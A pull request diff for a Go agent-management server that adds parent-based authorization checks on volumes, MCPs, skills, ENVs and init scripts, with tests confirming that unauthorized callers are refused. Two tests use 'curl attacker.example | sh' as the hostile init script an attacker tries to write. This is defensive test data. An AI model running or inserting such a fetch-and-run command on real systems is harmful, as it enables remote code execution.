### PR TITLE
Authorize a sub-resource through the parent that owns it

### DIFF
--- a/internal/server/authorization.go
+++ b/internal/server/authorization.go
@@ -127,6 +127,85 @@ func (s *Server) requireEnvironmentWrite(ctx context.Context, environment store.
 	return s.requireEnvironmentRelation(ctx, identityID, environment.Meta.ID, "can_edit_config")
 }
 
+// configParent is the object a sub-resource is authorized through. Volumes,
+// MCPs, init scripts and ENVs hold no tuples of their own; exactly one of these
+// is set.
+type configParent struct {
+	agentID       *uuid.UUID
+	environmentID *uuid.UUID
+}
+
+// resolveConfigParent names the agent or environment a sub-resource belongs to,
+// taking the three target pointers in the order publishAgentUpdatedForConfigTarget
+// reads them so both pick the same parent for a row. An MCP is itself a
+// sub-resource, so an MCP target resolves on to the MCP's own parent.
+//
+// It fails closed. envs lost its target CHECK with the hook_id column, so a row
+// naming nothing is reachable, and there is no parent to authorize it against.
+func (s *Server) resolveConfigParent(ctx context.Context, agentID *uuid.UUID, mcpID *uuid.UUID, environmentID *uuid.UUID) (configParent, error) {
+	if environmentID != nil {
+		return configParent{environmentID: environmentID}, nil
+	}
+	if agentID != nil {
+		return configParent{agentID: agentID}, nil
+	}
+	if mcpID != nil {
+		mcp, err := s.store.GetMcp(ctx, *mcpID)
+		if err != nil {
+			return configParent{}, toStatusError(err)
+		}
+		if mcp.EnvironmentID != nil {
+			return configParent{environmentID: mcp.EnvironmentID}, nil
+		}
+		if mcp.AgentID != nil {
+			return configParent{agentID: mcp.AgentID}, nil
+		}
+	}
+	return configParent{}, status.Error(codes.FailedPrecondition, "resource names no agent or environment to authorize against")
+}
+
+func (s *Server) requireConfigRelation(ctx context.Context, identityID uuid.UUID, parent configParent, relation string) error {
+	if parent.agentID != nil {
+		return s.requireAgentRelation(ctx, identityID, *parent.agentID, relation)
+	}
+	return s.requireEnvironmentRelation(ctx, identityID, *parent.environmentID, relation)
+}
+
+// requireConfigRead authorizes reading a sub-resource through its parent, and is
+// the counterpart of requireEnvironmentConfigRead for rows an agent may own. An
+// internal caller holds no tuples and is served before the parent is resolved,
+// so the Orchestrator pays no extra lookup while assembling workloads.
+func (s *Server) requireConfigRead(ctx context.Context, agentID *uuid.UUID, mcpID *uuid.UUID, environmentID *uuid.UUID) error {
+	identityID, hasIdentity, err := optionalIdentityUUIDFromContext(ctx)
+	if err != nil {
+		return err
+	}
+	if !hasIdentity {
+		return nil
+	}
+	parent, err := s.resolveConfigParent(ctx, agentID, mcpID, environmentID)
+	if err != nil {
+		return err
+	}
+	return s.requireConfigRelation(ctx, identityID, parent, "can_read_config")
+}
+
+// requireConfigWrite authorizes changing a sub-resource through its parent.
+// These RPCs have no internal callers, so an identity is required. It takes ids
+// rather than a loaded row so a handler need not read a parent purely to
+// authorize.
+func (s *Server) requireConfigWrite(ctx context.Context, agentID *uuid.UUID, mcpID *uuid.UUID, environmentID *uuid.UUID) error {
+	identityID, err := identityUUIDFromContext(ctx)
+	if err != nil {
+		return err
+	}
+	parent, err := s.resolveConfigParent(ctx, agentID, mcpID, environmentID)
+	if err != nil {
+		return err
+	}
+	return s.requireConfigRelation(ctx, identityID, parent, "can_edit_config")
+}
+
 // requireEnvironmentUse gates running a workload in an environment. A shell in
 // a sandbox there reaches the environment's secrets, egress credentials and
 // volume contents, so this is a grant rather than a consequence of visibility.
@@ -250,6 +329,11 @@ func (s *Server) removeEnvironmentRoleAuthorization(ctx context.Context, environ
 func (s *Server) requireEnvironmentRelation(ctx context.Context, identityID uuid.UUID, environmentID uuid.UUID, relation string) error {
 	return s.requireAllowed(ctx, identityID, relation, environmentPrefix+environmentID.String(),
 		status.Errorf(codes.PermissionDenied, "identity lacks %s on environment", relation))
+}
+
+func (s *Server) requireAgentRelation(ctx context.Context, identityID uuid.UUID, agentID uuid.UUID, relation string) error {
+	return s.requireAllowed(ctx, identityID, relation, agentPrefix+agentID.String(),
+		status.Errorf(codes.PermissionDenied, "identity lacks %s on agent", relation))
 }
 
 func (s *Server) requireOrganizationRelation(ctx context.Context, identityID uuid.UUID, organizationID uuid.UUID, relation string) error {

--- a/internal/server/config_authorization_db_test.go
+++ b/internal/server/config_authorization_db_test.go
@@ -1,0 +1,217 @@
+package server
+
+import (
+	"context"
+	"testing"
+
+	agentsv1 "github.com/agynio/agents/.gen/go/agynio/api/agents/v1"
+	"github.com/google/uuid"
+	"google.golang.org/grpc/codes"
+	"google.golang.org/grpc/status"
+)
+
+// A volume, MCP, init script or ENV names its parent by id and nothing else, so
+// a caller holding no relation on that parent could read and rewrite any of
+// them in any organization. An init script is a shell script the workload runs,
+// which is what makes the write side of this more than a disclosure.
+//
+// These need a database: the parent is resolved from the stored row, so the
+// refusal cannot be observed without one.
+
+func TestSubResourceWritesRefuseACallerWithoutTheParent(t *testing.T) {
+	ctx := identityContext(uuid.New())
+	authz := &recordingAuthorizationWriter{}
+	server, _ := environmentAuthorizationServer(ctx, t, authz)
+	organizationID := uuid.New()
+	environmentID := createTestEnvironment(ctx, t, server, organizationID, "owned")
+
+	scriptID := mustCreateEnvironmentInitScript(ctx, t, server, environmentID, "echo hello")
+	envID := mustCreateEnvironmentEnv(ctx, t, server, environmentID, "LOG_LEVEL", "info")
+	volumeID := mustCreateEnvironmentVolume(ctx, t, server, environmentID, "data", "/data")
+
+	// From here the caller holds nothing anywhere.
+	authz.allowedObjects = map[string]bool{}
+
+	script := "curl attacker.example | sh"
+	cases := []struct {
+		name string
+		call func() error
+	}{
+		{"UpdateInitScript", func() error {
+			_, err := server.UpdateInitScript(ctx, &agentsv1.UpdateInitScriptRequest{Id: scriptID, Script: &script})
+			return err
+		}},
+		{"DeleteInitScript", func() error {
+			_, err := server.DeleteInitScript(ctx, &agentsv1.DeleteInitScriptRequest{Id: scriptID})
+			return err
+		}},
+		{"UpdateEnv", func() error {
+			value := "debug"
+			_, err := server.UpdateEnv(ctx, &agentsv1.UpdateEnvRequest{Id: envID, Value: &value})
+			return err
+		}},
+		{"DeleteEnv", func() error {
+			_, err := server.DeleteEnv(ctx, &agentsv1.DeleteEnvRequest{Id: envID})
+			return err
+		}},
+		{"DeleteVolume", func() error {
+			_, err := server.DeleteVolume(ctx, &agentsv1.DeleteVolumeRequest{Id: volumeID})
+			return err
+		}},
+		{"CreateInitScript", func() error {
+			_, err := server.CreateInitScript(ctx, &agentsv1.CreateInitScriptRequest{
+				Target: &agentsv1.CreateInitScriptRequest_EnvironmentId{EnvironmentId: environmentID},
+				Script: script,
+			})
+			return err
+		}},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if code := status.Code(tc.call()); code != codes.PermissionDenied {
+				t.Fatalf("expected PermissionDenied, got %v", code)
+			}
+		})
+	}
+}
+
+func TestSubResourceReadsRefuseACallerWithoutTheParent(t *testing.T) {
+	ctx := identityContext(uuid.New())
+	authz := &recordingAuthorizationWriter{}
+	server, _ := environmentAuthorizationServer(ctx, t, authz)
+	environmentID := createTestEnvironment(ctx, t, server, uuid.New(), "owned")
+
+	scriptID := mustCreateEnvironmentInitScript(ctx, t, server, environmentID, "echo hello")
+	envID := mustCreateEnvironmentEnv(ctx, t, server, environmentID, "LOG_LEVEL", "info")
+	volumeID := mustCreateEnvironmentVolume(ctx, t, server, environmentID, "data", "/data")
+
+	authz.allowedObjects = map[string]bool{}
+
+	cases := []struct {
+		name string
+		call func() error
+	}{
+		{"GetInitScript", func() error {
+			_, err := server.GetInitScript(ctx, &agentsv1.GetInitScriptRequest{Id: scriptID})
+			return err
+		}},
+		{"GetEnv", func() error {
+			_, err := server.GetEnv(ctx, &agentsv1.GetEnvRequest{Id: envID})
+			return err
+		}},
+		{"GetVolume", func() error {
+			_, err := server.GetVolume(ctx, &agentsv1.GetVolumeRequest{Id: volumeID})
+			return err
+		}},
+		{"ListInitScripts", func() error {
+			_, err := server.ListInitScripts(ctx, &agentsv1.ListInitScriptsRequest{EnvironmentId: environmentID})
+			return err
+		}},
+		{"ListVolumes", func() error {
+			_, err := server.ListVolumes(ctx, &agentsv1.ListVolumesRequest{EnvironmentId: environmentID})
+			return err
+		}},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if code := status.Code(tc.call()); code != codes.PermissionDenied {
+				t.Fatalf("expected PermissionDenied, got %v", code)
+			}
+		})
+	}
+}
+
+// The Orchestrator reads all of this over the mesh carrying no identity, and
+// assembling a workload must not start depending on tuples it does not hold.
+func TestSubResourceReadsServeAnInternalCaller(t *testing.T) {
+	ctx := identityContext(uuid.New())
+	authz := &recordingAuthorizationWriter{}
+	server, _ := environmentAuthorizationServer(ctx, t, authz)
+	environmentID := createTestEnvironment(ctx, t, server, uuid.New(), "owned")
+	scriptID := mustCreateEnvironmentInitScript(ctx, t, server, environmentID, "echo hello")
+	volumeID := mustCreateEnvironmentVolume(ctx, t, server, environmentID, "data", "/data")
+
+	authz.allowedObjects = map[string]bool{}
+	internal := context.Background()
+
+	if _, err := server.GetInitScript(internal, &agentsv1.GetInitScriptRequest{Id: scriptID}); err != nil {
+		t.Fatalf("GetInitScript refused an internal caller: %v", err)
+	}
+	if _, err := server.GetVolume(internal, &agentsv1.GetVolumeRequest{Id: volumeID}); err != nil {
+		t.Fatalf("GetVolume refused an internal caller: %v", err)
+	}
+	if _, err := server.ListInitScripts(internal, &agentsv1.ListInitScriptsRequest{EnvironmentId: environmentID}); err != nil {
+		t.Fatalf("ListInitScripts refused an internal caller: %v", err)
+	}
+}
+
+// A write has no internal caller, so an absent identity is refused rather than
+// served the way a read is.
+func TestSubResourceWritesRefuseAnInternalCaller(t *testing.T) {
+	ctx := identityContext(uuid.New())
+	authz := &recordingAuthorizationWriter{}
+	server, _ := environmentAuthorizationServer(ctx, t, authz)
+	environmentID := createTestEnvironment(ctx, t, server, uuid.New(), "owned")
+	scriptID := mustCreateEnvironmentInitScript(ctx, t, server, environmentID, "echo hello")
+
+	script := "curl attacker.example | sh"
+	_, err := server.UpdateInitScript(context.Background(), &agentsv1.UpdateInitScriptRequest{Id: scriptID, Script: &script})
+	if code := status.Code(err); code != codes.Unauthenticated {
+		t.Fatalf("expected Unauthenticated, got %v", code)
+	}
+}
+
+// The parent is the object the check names, not the organization the row also
+// carries: org membership is strictly weaker than can_edit_config.
+func TestSubResourceWriteChecksTheParent(t *testing.T) {
+	ctx := identityContext(uuid.New())
+	authz := &recordingAuthorizationWriter{}
+	server, _ := environmentAuthorizationServer(ctx, t, authz)
+	environmentID := createTestEnvironment(ctx, t, server, uuid.New(), "owned")
+	scriptID := mustCreateEnvironmentInitScript(ctx, t, server, environmentID, "echo hello")
+
+	authz.checks = nil
+	script := "echo goodbye"
+	if _, err := server.UpdateInitScript(ctx, &agentsv1.UpdateInitScriptRequest{Id: scriptID, Script: &script}); err != nil {
+		t.Fatalf("update init script: %v", err)
+	}
+	assertChecked(t, authz, "can_edit_config", environmentPrefix+environmentID)
+}
+
+func mustCreateEnvironmentInitScript(ctx context.Context, t *testing.T, server *Server, environmentID, script string) string {
+	t.Helper()
+	created, err := server.CreateInitScript(ctx, &agentsv1.CreateInitScriptRequest{
+		Target: &agentsv1.CreateInitScriptRequest_EnvironmentId{EnvironmentId: environmentID},
+		Script: script,
+	})
+	if err != nil {
+		t.Fatalf("create init script: %v", err)
+	}
+	return created.GetInitScript().GetMeta().GetId()
+}
+
+func mustCreateEnvironmentEnv(ctx context.Context, t *testing.T, server *Server, environmentID, name, value string) string {
+	t.Helper()
+	created, err := server.CreateEnv(ctx, &agentsv1.CreateEnvRequest{
+		Target: &agentsv1.CreateEnvRequest_EnvironmentId{EnvironmentId: environmentID},
+		Name:   name,
+		Source: &agentsv1.CreateEnvRequest_Value{Value: value},
+	})
+	if err != nil {
+		t.Fatalf("create env: %v", err)
+	}
+	return created.GetEnv().GetMeta().GetId()
+}
+
+func mustCreateEnvironmentVolume(ctx context.Context, t *testing.T, server *Server, environmentID, name, path string) string {
+	t.Helper()
+	created, err := server.CreateVolume(ctx, &agentsv1.CreateVolumeRequest{
+		Target:    &agentsv1.CreateVolumeRequest_EnvironmentId{EnvironmentId: environmentID},
+		Name:      name,
+		MountPath: path,
+	})
+	if err != nil {
+		t.Fatalf("create volume: %v", err)
+	}
+	return created.GetVolume().GetMeta().GetId()
+}

--- a/internal/server/env_test.go
+++ b/internal/server/env_test.go
@@ -142,17 +142,18 @@ func TestEnvListFilterScopesTheInternalCallerToANamedOrganization(t *testing.T) 
 	}
 }
 
+// An mcp target is covered by the database tests: its parent is only knowable
+// by reading the server, so there is nothing to assert without a store.
 func TestEnvListFilterNarrowsByEveryTarget(t *testing.T) {
-	server := &Server{authz: &recordingAuthorizationWriter{}}
+	authz := &recordingAuthorizationWriter{}
+	server := &Server{authz: authz}
 	organizationID := uuid.New()
 	agentID := uuid.New()
-	mcpID := uuid.New()
 	environmentID := uuid.New()
 
 	filter, err := server.envListFilter(identityContext(uuid.New()), &agentsv1.ListEnvsRequest{
 		OrganizationId: organizationID.String(),
 		AgentId:        agentID.String(),
-		McpId:          mcpID.String(),
 		EnvironmentId:  environmentID.String(),
 	})
 	if err != nil {
@@ -161,13 +162,26 @@ func TestEnvListFilterNarrowsByEveryTarget(t *testing.T) {
 	for name, pair := range map[string][2]*uuid.UUID{
 		"organization": {filter.OrganizationID, &organizationID},
 		"agent":        {filter.AgentID, &agentID},
-		"mcp":          {filter.McpID, &mcpID},
 		"environment":  {filter.EnvironmentID, &environmentID},
 	} {
 		if pair[0] == nil || *pair[0] != *pair[1] {
 			t.Fatalf("expected %s filter %s, got %v", name, pair[1], pair[0])
 		}
 	}
+	// Each named target is authorized through its own parent, not through the
+	// organization the request also carries.
+	assertChecked(t, authz, "can_read_config", agentPrefix+agentID.String())
+	assertChecked(t, authz, "can_read_config", environmentPrefix+environmentID.String())
+}
+
+func assertChecked(t *testing.T, authz *recordingAuthorizationWriter, relation, object string) {
+	t.Helper()
+	for _, check := range authz.checks {
+		if check.GetTupleKey().GetRelation() == relation && check.GetTupleKey().GetObject() == object {
+			return
+		}
+	}
+	t.Fatalf("expected a %s check on %s, got %d checks", relation, object, len(authz.checks))
 }
 
 func TestEnvListFilterRejectsAMalformedOrganization(t *testing.T) {

--- a/internal/server/environment_authorization_db_test.go
+++ b/internal/server/environment_authorization_db_test.go
@@ -50,6 +50,9 @@ func seedEnvironment(ctx context.Context, t *testing.T, backing *store.Store, or
 		RunnerID:     &runnerID,
 		Flavor:       "small",
 		Availability: store.EnvironmentAvailabilityPrivate,
+		// The column is CHECK-constrained; the handler defaults it, so a seed
+		// going straight to the store has to name it.
+		LLMMode: store.LLMModePlatform,
 	})
 	if err != nil {
 		t.Fatalf("seed environment: %v", err)

--- a/internal/server/environment_scope_db_test.go
+++ b/internal/server/environment_scope_db_test.go
@@ -24,6 +24,8 @@ func TestEnvironmentScopedListsAreScoped(t *testing.T) {
 	mustCreateMcp(ctx, t, server, second, "beta")
 	mustCreateVolume(ctx, t, server, first, "data", "/data")
 	mustCreateVolume(ctx, t, server, second, "cache", "/cache")
+	mustCreateInitScript(ctx, t, server, first, "echo first")
+	mustCreateInitScript(ctx, t, server, second, "echo second")
 
 	mcps, err := server.ListMcps(ctx, &agentsv1.ListMcpsRequest{EnvironmentId: first})
 	if err != nil {
@@ -45,8 +47,8 @@ func TestEnvironmentScopedListsAreScoped(t *testing.T) {
 	if err != nil {
 		t.Fatalf("list init scripts: %v", err)
 	}
-	if len(scripts.GetInitScripts()) != 0 {
-		t.Fatalf("expected no scripts on the first environment, got %d", len(scripts.GetInitScripts()))
+	if len(scripts.GetInitScripts()) != 1 || scripts.GetInitScripts()[0].GetScript() != "echo first" {
+		t.Fatalf("expected only the first environment's script, got %d", len(scripts.GetInitScripts()))
 	}
 }
 
@@ -56,6 +58,16 @@ func mustCreateMcp(ctx context.Context, t *testing.T, server *Server, environmen
 		EnvironmentId: environmentID, Name: name, Command: "run",
 	}); err != nil {
 		t.Fatalf("create mcp %s: %v", name, err)
+	}
+}
+
+func mustCreateInitScript(ctx context.Context, t *testing.T, server *Server, environmentID, script string) {
+	t.Helper()
+	if _, err := server.CreateInitScript(ctx, &agentsv1.CreateInitScriptRequest{
+		Target: &agentsv1.CreateInitScriptRequest_EnvironmentId{EnvironmentId: environmentID},
+		Script: script,
+	}); err != nil {
+		t.Fatalf("create init script %q: %v", script, err)
 	}
 }
 

--- a/internal/server/server.go
+++ b/internal/server/server.go
@@ -727,7 +727,7 @@ func (s *Server) volumeTarget(ctx context.Context, environmentIDRaw, mcpIDRaw st
 		if err != nil {
 			return input, uuid.UUID{}, toStatusError(err)
 		}
-		if err := s.requireEnvironmentWrite(ctx, environment); err != nil {
+		if err := s.requireConfigWrite(ctx, nil, nil, &environmentID); err != nil {
 			return input, uuid.UUID{}, err
 		}
 		input.EnvironmentID = &environmentID
@@ -740,6 +740,9 @@ func (s *Server) volumeTarget(ctx context.Context, environmentIDRaw, mcpIDRaw st
 		mcp, err := s.store.GetMcp(ctx, mcpID)
 		if err != nil {
 			return input, uuid.UUID{}, toStatusError(err)
+		}
+		if err := s.requireConfigWrite(ctx, mcp.AgentID, nil, mcp.EnvironmentID); err != nil {
+			return input, uuid.UUID{}, err
 		}
 		input.McpID = &mcpID
 		return input, mcp.OrganizationID, nil
@@ -788,6 +791,9 @@ func (s *Server) GetVolume(ctx context.Context, req *agentsv1.GetVolumeRequest) 
 	if err != nil {
 		return nil, toStatusError(err)
 	}
+	if err := s.requireConfigRead(ctx, nil, volume.McpID, volume.EnvironmentID); err != nil {
+		return nil, err
+	}
 	return &agentsv1.GetVolumeResponse{Volume: toProtoVolume(volume)}, nil
 }
 
@@ -804,7 +810,7 @@ func (s *Server) UpdateVolume(ctx context.Context, req *agentsv1.UpdateVolumeReq
 	if err != nil {
 		return nil, toStatusError(err)
 	}
-	if err := s.requireVolumeWrite(ctx, existing); err != nil {
+	if err := s.requireConfigWrite(ctx, nil, existing.McpID, existing.EnvironmentID); err != nil {
 		return nil, err
 	}
 
@@ -863,6 +869,9 @@ func (s *Server) DeleteVolume(ctx context.Context, req *agentsv1.DeleteVolumeReq
 	if err != nil {
 		return nil, toStatusError(err)
 	}
+	if err := s.requireConfigWrite(ctx, nil, volume.McpID, volume.EnvironmentID); err != nil {
+		return nil, err
+	}
 	if err := s.store.DeleteVolume(ctx, id); err != nil {
 		return nil, toStatusError(err)
 	}
@@ -896,6 +905,9 @@ func (s *Server) ListVolumes(ctx context.Context, req *agentsv1.ListVolumesReque
 		mcp, err := s.store.GetMcp(ctx, mcpID)
 		if err != nil {
 			return nil, toStatusError(err)
+		}
+		if err := s.requireConfigRead(ctx, mcp.AgentID, nil, mcp.EnvironmentID); err != nil {
+			return nil, err
 		}
 		filter.McpID = &mcpID
 		organizationID = mcp.OrganizationID
@@ -938,7 +950,7 @@ func (s *Server) CreateMcp(ctx context.Context, req *agentsv1.CreateMcpRequest) 
 		if err != nil {
 			return nil, toStatusError(err)
 		}
-		if err := s.requireEnvironmentWrite(ctx, environment); err != nil {
+		if err := s.requireConfigWrite(ctx, nil, nil, &environmentID); err != nil {
 			return nil, err
 		}
 		input.EnvironmentID = &environmentID
@@ -950,6 +962,9 @@ func (s *Server) CreateMcp(ctx context.Context, req *agentsv1.CreateMcpRequest) 
 		}
 		organizationID, err = s.organizationOfAgent(ctx, agentID)
 		if err != nil {
+			return nil, err
+		}
+		if err := s.requireConfigWrite(ctx, &agentID, nil, nil); err != nil {
 			return nil, err
 		}
 		input.AgentID = &agentID
@@ -991,6 +1006,9 @@ func (s *Server) GetMcp(ctx context.Context, req *agentsv1.GetMcpRequest) (*agen
 	if err != nil {
 		return nil, toStatusError(err)
 	}
+	if err := s.requireConfigRead(ctx, mcp.AgentID, nil, mcp.EnvironmentID); err != nil {
+		return nil, err
+	}
 	return &agentsv1.GetMcpResponse{Mcp: toProtoMcp(mcp)}, nil
 }
 
@@ -1002,6 +1020,14 @@ func (s *Server) UpdateMcp(ctx context.Context, req *agentsv1.UpdateMcpRequest) 
 	if req.Image == nil && req.Command == nil && req.Resources == nil && req.Description == nil &&
 		req.ImageId == nil && req.ImageTag == nil {
 		return nil, status.Error(codes.InvalidArgument, "at least one field must be provided")
+	}
+
+	existing, err := s.store.GetMcp(ctx, id)
+	if err != nil {
+		return nil, toStatusError(err)
+	}
+	if err := s.requireConfigWrite(ctx, existing.AgentID, nil, existing.EnvironmentID); err != nil {
+		return nil, err
 	}
 
 	update := store.McpUpdate{}
@@ -1042,6 +1068,9 @@ func (s *Server) DeleteMcp(ctx context.Context, req *agentsv1.DeleteMcpRequest) 
 	if err != nil {
 		return nil, toStatusError(err)
 	}
+	if err := s.requireConfigWrite(ctx, mcp.AgentID, nil, mcp.EnvironmentID); err != nil {
+		return nil, err
+	}
 	if err := s.store.DeleteMcp(ctx, id); err != nil {
 		return nil, toStatusError(err)
 	}
@@ -1062,7 +1091,7 @@ func (s *Server) ListMcps(ctx context.Context, req *agentsv1.ListMcpsRequest) (*
 		if err != nil {
 			return nil, status.Errorf(codes.InvalidArgument, "environment_id: %v", err)
 		}
-		if err := s.requireEnvironmentConfigRead(ctx, environmentID); err != nil {
+		if err := s.requireConfigRead(ctx, nil, nil, &environmentID); err != nil {
 			return nil, err
 		}
 		filter.EnvironmentID = &environmentID
@@ -1070,6 +1099,9 @@ func (s *Server) ListMcps(ctx context.Context, req *agentsv1.ListMcpsRequest) (*
 		agentID, err := parseUUID(req.GetAgentId())
 		if err != nil {
 			return nil, status.Errorf(codes.InvalidArgument, "agent_id: %v", err)
+		}
+		if err := s.requireConfigRead(ctx, &agentID, nil, nil); err != nil {
+			return nil, err
 		}
 		filter.AgentID = &agentID
 	default:
@@ -1088,6 +1120,9 @@ func (s *Server) CreateSkill(ctx context.Context, req *agentsv1.CreateSkillReque
 	agentID, err := parseUUID(req.GetAgentId())
 	if err != nil {
 		return nil, status.Errorf(codes.InvalidArgument, "agent_id: %v", err)
+	}
+	if err := s.requireConfigWrite(ctx, &agentID, nil, nil); err != nil {
+		return nil, err
 	}
 	skill, err := s.store.CreateSkill(ctx, store.SkillInput{
 		AgentID:     agentID,
@@ -1111,6 +1146,9 @@ func (s *Server) GetSkill(ctx context.Context, req *agentsv1.GetSkillRequest) (*
 	if err != nil {
 		return nil, toStatusError(err)
 	}
+	if err := s.requireConfigRead(ctx, &skill.AgentID, nil, nil); err != nil {
+		return nil, err
+	}
 	return &agentsv1.GetSkillResponse{Skill: toProtoSkill(skill)}, nil
 }
 
@@ -1121,6 +1159,14 @@ func (s *Server) UpdateSkill(ctx context.Context, req *agentsv1.UpdateSkillReque
 	}
 	if req.Name == nil && req.Body == nil && req.Description == nil {
 		return nil, status.Error(codes.InvalidArgument, "at least one field must be provided")
+	}
+
+	existing, err := s.store.GetSkill(ctx, id)
+	if err != nil {
+		return nil, toStatusError(err)
+	}
+	if err := s.requireConfigWrite(ctx, &existing.AgentID, nil, nil); err != nil {
+		return nil, err
 	}
 
 	update := store.SkillUpdate{}
@@ -1154,6 +1200,9 @@ func (s *Server) DeleteSkill(ctx context.Context, req *agentsv1.DeleteSkillReque
 	if err != nil {
 		return nil, toStatusError(err)
 	}
+	if err := s.requireConfigWrite(ctx, &skill.AgentID, nil, nil); err != nil {
+		return nil, err
+	}
 	if err := s.store.DeleteSkill(ctx, id); err != nil {
 		return nil, toStatusError(err)
 	}
@@ -1173,6 +1222,9 @@ func (s *Server) ListSkills(ctx context.Context, req *agentsv1.ListSkillsRequest
 	agentID, err := parseUUID(req.GetAgentId())
 	if err != nil {
 		return nil, status.Errorf(codes.InvalidArgument, "agent_id: %v", err)
+	}
+	if err := s.requireConfigRead(ctx, &agentID, nil, nil); err != nil {
+		return nil, err
 	}
 	filter := store.SkillFilter{AgentID: &agentID}
 
@@ -1212,6 +1264,9 @@ func (s *Server) CreateEnv(ctx context.Context, req *agentsv1.CreateEnvRequest) 
 	default:
 		return nil, status.Error(codes.InvalidArgument, "target must be specified")
 	}
+	if err := s.requireConfigWrite(ctx, input.AgentID, input.McpID, input.EnvironmentID); err != nil {
+		return nil, err
+	}
 
 	switch source := req.GetSource().(type) {
 	case *agentsv1.CreateEnvRequest_Value:
@@ -1244,6 +1299,9 @@ func (s *Server) GetEnv(ctx context.Context, req *agentsv1.GetEnvRequest) (*agen
 	if err != nil {
 		return nil, toStatusError(err)
 	}
+	if err := s.requireConfigRead(ctx, env.AgentID, env.McpID, env.EnvironmentID); err != nil {
+		return nil, err
+	}
 	return &agentsv1.GetEnvResponse{Env: toProtoEnv(env)}, nil
 }
 
@@ -1257,6 +1315,14 @@ func (s *Server) UpdateEnv(ctx context.Context, req *agentsv1.UpdateEnvRequest) 
 	}
 	if req.Value != nil && req.SecretId != nil {
 		return nil, status.Error(codes.InvalidArgument, "value and secret_id cannot both be set")
+	}
+
+	existing, err := s.store.GetEnv(ctx, id)
+	if err != nil {
+		return nil, toStatusError(err)
+	}
+	if err := s.requireConfigWrite(ctx, existing.AgentID, existing.McpID, existing.EnvironmentID); err != nil {
+		return nil, err
 	}
 
 	update := store.EnvUpdate{}
@@ -1296,6 +1362,9 @@ func (s *Server) DeleteEnv(ctx context.Context, req *agentsv1.DeleteEnvRequest) 
 	env, err := s.store.GetEnv(ctx, id)
 	if err != nil {
 		return nil, toStatusError(err)
+	}
+	if err := s.requireConfigWrite(ctx, env.AgentID, env.McpID, env.EnvironmentID); err != nil {
+		return nil, err
 	}
 	if err := s.store.DeleteEnv(ctx, id); err != nil {
 		return nil, toStatusError(err)
@@ -1338,12 +1407,18 @@ func (s *Server) envListFilter(ctx context.Context, req *agentsv1.ListEnvsReques
 		if err != nil {
 			return store.EnvFilter{}, status.Errorf(codes.InvalidArgument, "agent_id: %v", err)
 		}
+		if err := s.requireConfigRead(ctx, &agentID, nil, nil); err != nil {
+			return store.EnvFilter{}, err
+		}
 		filter.AgentID = &agentID
 	}
 	if req.GetMcpId() != "" {
 		mcpID, err := parseUUID(req.GetMcpId())
 		if err != nil {
 			return store.EnvFilter{}, status.Errorf(codes.InvalidArgument, "mcp_id: %v", err)
+		}
+		if err := s.requireConfigRead(ctx, nil, &mcpID, nil); err != nil {
+			return store.EnvFilter{}, err
 		}
 		filter.McpID = &mcpID
 	}
@@ -1352,7 +1427,7 @@ func (s *Server) envListFilter(ctx context.Context, req *agentsv1.ListEnvsReques
 		if err != nil {
 			return store.EnvFilter{}, status.Errorf(codes.InvalidArgument, "environment_id: %v", err)
 		}
-		if err := s.requireEnvironmentConfigRead(ctx, environmentID); err != nil {
+		if err := s.requireConfigRead(ctx, nil, nil, &environmentID); err != nil {
 			return store.EnvFilter{}, err
 		}
 		filter.EnvironmentID = &environmentID
@@ -1404,13 +1479,15 @@ func (s *Server) CreateInitScript(ctx context.Context, req *agentsv1.CreateInitS
 		if err != nil {
 			return nil, toStatusError(err)
 		}
-		if err := s.requireEnvironmentWrite(ctx, environment); err != nil {
-			return nil, err
-		}
 		organizationID = environment.OrganizationID
 		input.EnvironmentID = &id
 	default:
 		return nil, status.Error(codes.InvalidArgument, "target must be specified")
+	}
+	// An init script is a shell script the workload runs, so writing one is
+	// authorized as any other configuration write on the parent.
+	if err := s.requireConfigWrite(ctx, input.AgentID, input.McpID, input.EnvironmentID); err != nil {
+		return nil, err
 	}
 
 	script, err := s.store.CreateInitScript(ctx, organizationID, input)
@@ -1430,6 +1507,9 @@ func (s *Server) GetInitScript(ctx context.Context, req *agentsv1.GetInitScriptR
 	if err != nil {
 		return nil, toStatusError(err)
 	}
+	if err := s.requireConfigRead(ctx, script.AgentID, script.McpID, script.EnvironmentID); err != nil {
+		return nil, err
+	}
 	return &agentsv1.GetInitScriptResponse{InitScript: toProtoInitScript(script)}, nil
 }
 
@@ -1440,6 +1520,14 @@ func (s *Server) UpdateInitScript(ctx context.Context, req *agentsv1.UpdateInitS
 	}
 	if req.Script == nil && req.Description == nil {
 		return nil, status.Error(codes.InvalidArgument, "at least one field must be provided")
+	}
+
+	existing, err := s.store.GetInitScript(ctx, id)
+	if err != nil {
+		return nil, toStatusError(err)
+	}
+	if err := s.requireConfigWrite(ctx, existing.AgentID, existing.McpID, existing.EnvironmentID); err != nil {
+		return nil, err
 	}
 
 	update := store.InitScriptUpdate{}
@@ -1456,7 +1544,7 @@ func (s *Server) UpdateInitScript(ctx context.Context, req *agentsv1.UpdateInitS
 	if err != nil {
 		return nil, toStatusError(err)
 	}
-	s.publishAgentUpdatedForTarget(ctx, script.AgentID, script.McpID)
+	s.publishAgentUpdatedForConfigTarget(ctx, script.AgentID, script.McpID, script.EnvironmentID)
 	return &agentsv1.UpdateInitScriptResponse{InitScript: toProtoInitScript(script)}, nil
 }
 
@@ -1469,10 +1557,13 @@ func (s *Server) DeleteInitScript(ctx context.Context, req *agentsv1.DeleteInitS
 	if err != nil {
 		return nil, toStatusError(err)
 	}
+	if err := s.requireConfigWrite(ctx, script.AgentID, script.McpID, script.EnvironmentID); err != nil {
+		return nil, err
+	}
 	if err := s.store.DeleteInitScript(ctx, id); err != nil {
 		return nil, toStatusError(err)
 	}
-	s.publishAgentUpdatedForTarget(ctx, script.AgentID, script.McpID)
+	s.publishAgentUpdatedForConfigTarget(ctx, script.AgentID, script.McpID, script.EnvironmentID)
 	return &agentsv1.DeleteInitScriptResponse{}, nil
 }
 
@@ -1489,7 +1580,7 @@ func (s *Server) ListInitScripts(ctx context.Context, req *agentsv1.ListInitScri
 		if err != nil {
 			return nil, status.Errorf(codes.InvalidArgument, "environment_id: %v", err)
 		}
-		if err := s.requireEnvironmentConfigRead(ctx, environmentID); err != nil {
+		if err := s.requireConfigRead(ctx, nil, nil, &environmentID); err != nil {
 			return nil, err
 		}
 		filter.EnvironmentID = &environmentID
